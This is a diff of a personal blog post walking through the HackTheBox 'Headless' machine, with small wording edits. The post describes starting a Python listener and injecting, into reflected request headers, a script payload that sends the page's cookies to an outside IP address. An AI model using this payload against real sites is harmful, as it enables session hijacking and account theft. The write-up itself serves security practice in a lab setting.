brenda87/brenda87.github.io/posts/hackthebox/headless.md

 ### User flag

 ### Cookie stealing
 I looked for how to steal cookies and found this [article](https://pswalia2u.medium.com/exploiting-xss-stealing-cookies-csrf-2325ec03136e).
-First, I initiated a Python server on port 1234 using the command
+First, I initiated a Python server on port 1234 using the command:

 `python3 -m http.server 1234`

 Then, I captured an HTTP request and sent it to Repeater.
 Within Repeater, I injected a cookie-stealing payload into reflected headers like "User-Agent", "Accept" and "message" until I got a response.

 `<script>var i=new Image(); i.src="http://10.10.14.21:1234/?cookie="+btoa(document.cookie);</script>`

-I repeated this process until our server intercepted and processed the injected payload.
+I repeated this process until the server intercepted and processed the injected payload.

 ![image](https://raw.githubusercontent.com/brenda87/brenda87.github.io/main/assets/images/headless/Screenshot%20(130).png)